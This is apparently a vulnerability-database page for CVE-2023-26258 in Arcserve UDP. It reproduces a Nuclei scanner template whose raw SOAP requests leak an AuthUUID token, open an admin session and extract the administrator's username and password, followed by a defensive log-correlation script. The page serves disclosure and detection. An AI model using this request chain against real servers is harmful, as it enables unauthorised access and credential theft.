Arcserve UDP <= 9.0.6034 - Authentication Bypass

🗓️ 30 Jun 2026 04:56:11 | Reported by: ProjectDiscovery | Type: nuclei | Source: github.com

Arcserve UDP up to 9.0.6034 allows authentication bypass through a leaked AuthUUID token enabling an admin session.

id: CVE-2023-26258

info:
  name: Arcserve UDP <= 9.0.6034 - Authentication Bypass
  author: daffainfo
  severity: critical
  description: |
    Arcserve UDP through 9.0.6034 allows authentication bypass. The method getVersionInfo at WebServiceImpl/services/FlashServiceImpl leaks the AuthUUID token. This token can be used at /WebServiceImpl/services/VirtualStandbyServiceImpl to obtain a valid session. This session can be used to execute any task as administrator.
  impact: |
    Unauthenticated attackers can bypass authentication by leaking the AuthUUID token, allowing them to execute any administrative task and potentially compromise all backup data managed by Arcserve UDP.
  remediation: |
    Upgrade to Arcserve UDP version 9.1 or later that addresses this authentication bypass vulnerability.
  reference:
    - https://www.mdsec.co.uk/2023/06/cve-2023-26258-remote-code-execution-in-arcserve-udp-backup/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-26258
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-26258
    epss-score: 0.38362
    epss-percentile: 0.98379
    cwe-id: CWE-863
    cpe: cpe:2.3:a:arcserve:udp:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: arcserve
    product: udp
    shodan-query: http.favicon.hash:-1889244460
  tags: cve,cve2023,arcserve,auth-bypass,vkev,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /WebServiceImpl/services/FlashServiceImpl HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml

        <?xml version="1.0" encoding="UTF-8"?>
        <S:Envelope xmlns:S="http://schemas.xmlsoap.org/soap/envelope/">
          <S:Body>
            <ns2:getVersionInfo
                xmlns:ns2="http://webservice.arcflash.ca.com"
                xmlns:ns3="http://backup.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns4="http://data.webservice.arcflash.ca.com/xsd"
                xmlns:ns5="http://export.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns6="http://vsphere.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns7="http://browse.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns8="http://restore.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns9="http://catalog.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns10="http://activitylog.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns11="http://remotedeploy.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns12="http://history.job.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns13="http://webservice.edge.arcserve.ca.com/"/>
          </S:Body>
        </S:Envelope>

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/xml")'
          - 'contains(body, "ns5:authUUID")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: auth_uuid
        group: 1
        part: body
        internal: true
        regex:
          - '<ns5:authUUID>([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})</ns5:authUUID>'

  - raw:
      - |
        POST /WebServiceImpl/services/VirtualStandbyServiceImpl HTTP/1.1
        Host: {{Hostname}}
        SOAPAction: "<http://webservice.arcflash.ca.com/IEdgeDashboardService/validateUserByUUIDRequest>"
        Content-Type: text/xml

        <?xml version="1.0" encoding="UTF-8"?>
        <S:Envelope xmlns:S="http://schemas.xmlsoap.org/soap/envelope/">
          <S:Body>
            <ns2:validateUserByUUID
                xmlns:ns2="http://webservice.arcflash.ca.com"
                xmlns:ns3="http://backup.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns4="http://data.webservice.arcflash.ca.com/xsd"
                xmlns:ns5="http://export.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns6="http://vsphere.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns7="http://browse.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns8="http://restore.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns9="http://catalog.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns10="http://activitylog.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns11="http://remotedeploy.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns12="http://history.job.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns13="http://webservice.edge.arcserve.ca.com/">
                <arg0>{{auth_uuid}}</arg0>
            </ns2:validateUserByUUID>
          </S:Body>
        </S:Envelope>

      - |
        POST /WebServiceImpl/services/FlashServiceImpl HTTP/1.1
        Host: {{Hostname}}
        SOAPAction: "<http://webservice.arcflash.ca.com/IFlashService_R16_5/getVersionInfoRequest>"
        Content-Type: text/xml

        <?xml version="1.0" encoding="UTF-8"?>
          <S:Envelope xmlns:S="http://schemas.xmlsoap.org/soap/envelope/">
            <S:Body>
              <ns2:getLocalHostAsTrust
                xmlns:ns2="http://webservice.arcflash.ca.com"
                xmlns:ns3="http://backup.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns4="http://data.webservice.arcflash.ca.com/xsd"
                xmlns:ns5="http://export.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns6="http://vsphere.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns7="http://browse.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns8="http://restore.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns9="http://catalog.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns10="http://activitylog.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns11="http://remotedeploy.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns12="http://history.job.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns13="http://webservice.edge.arcserve.ca.com/"
              >
              </ns2:getLocalHostAsTrust>
            </S:Body>
          </S:Envelope>

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/xml")'
          - 'contains_all(body, "ns5:uuid", "ns5:userName", "ns5:password")'
        condition: and

    extractors:
      - type: regex
        group: 1
        part: body
        regex:
          - '<ns5:userName>(.*?)</ns5:userName>'

      - type: regex
        group: 1
        part: body
        regex:
          - '<ns5:password>(.*?)</ns5:password>'
# digest: 4b0a00483046022100eaaae06c2aba5ca3b87d2b5e4e26310097cac533ee2898b54feddcd634d3607c0221008ca6417639abb49f9dc2c594e9f476637b7d21c40c61199c508fad2129ee8f26:922c64590222798bb761d5b6d8e72950
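
For defenders reviewing whether a server was probed this way, the following added example (not part of the template or of ProjectDiscovery's code) correlates web access-log entries per client: a successful POST to the FlashServiceImpl endpoint followed shortly by a POST to VirtualStandbyServiceImpl, the two-step sequence the description outlines. The Common Log Format layout, the 60-second window and the sample lines are assumptions constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Endpoint paths taken from the template above.
LEAK_PATH = "/WebServiceImpl/services/FlashServiceImpl"
SESSION_PATH = "/WebServiceImpl/services/VirtualStandbyServiceImpl"
WINDOW = timedelta(seconds=60)  # assumed correlation window, tune per environment

# Assumed log layout: Common Log Format (client, timestamp, request line, status).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log lines (documentation address ranges), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [12/Jul/2023:10:15:01 +0000] "POST /WebServiceImpl/services/FlashServiceImpl HTTP/1.1" 200 2311
203.0.113.20 - - [12/Jul/2023:10:15:02 +0000] "POST /WebServiceImpl/services/FlashServiceImpl HTTP/1.1" 200 2311
198.51.100.7 - - [12/Jul/2023:10:15:03 +0000] "POST /WebServiceImpl/services/VirtualStandbyServiceImpl HTTP/1.1" 200 640
198.51.100.7 - - [12/Jul/2023:10:15:04 +0000] "POST /WebServiceImpl/services/FlashServiceImpl HTTP/1.1" 200 1875
203.0.113.20 - - [12/Jul/2023:10:20:30 +0000] "POST /WebServiceImpl/services/VirtualStandbyServiceImpl HTTP/1.1" 200 640
192.0.2.44 - - [12/Jul/2023:10:21:00 +0000] "GET /management/ HTTP/1.1" 200 5120
"""

def find_bypass_sequences(log_text, window=WINDOW):
    """Return (ip, leak_time, session_time) for each client that POSTs to
    FlashServiceImpl and then to VirtualStandbyServiceImpl within `window`."""
    last_leak = {}  # client ip -> time of its most recent 200 POST to LEAK_PATH
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST" or m["status"] != "200":
            continue  # unparseable line, other method, or failed request
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        path = m["path"].split("?", 1)[0]  # ignore any query string
        if path == LEAK_PATH:
            last_leak[m["ip"]] = ts
        elif path == SESSION_PATH and m["ip"] in last_leak:
            if timedelta(0) <= ts - last_leak[m["ip"]] <= window:
                hits.append((m["ip"], last_leak[m["ip"]], ts))
    return hits

if __name__ == "__main__":
    for ip, leak, sess in find_bypass_sequences(SAMPLE_LOG):
        print(f"{ip}: FlashServiceImpl {leak:%H:%M:%S} -> VirtualStandbyServiceImpl {sess:%H:%M:%S}")
```

A match is a lead for review rather than proof, since the page does not say which legitimate clients call these services; compare the client address against known consoles and agents.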

Scores (current as of 04 Feb 2026 07:00): Vulners AI Score 7.3 (High risk) | CVSS 3.1: 9.8 | EPSS: 0.38362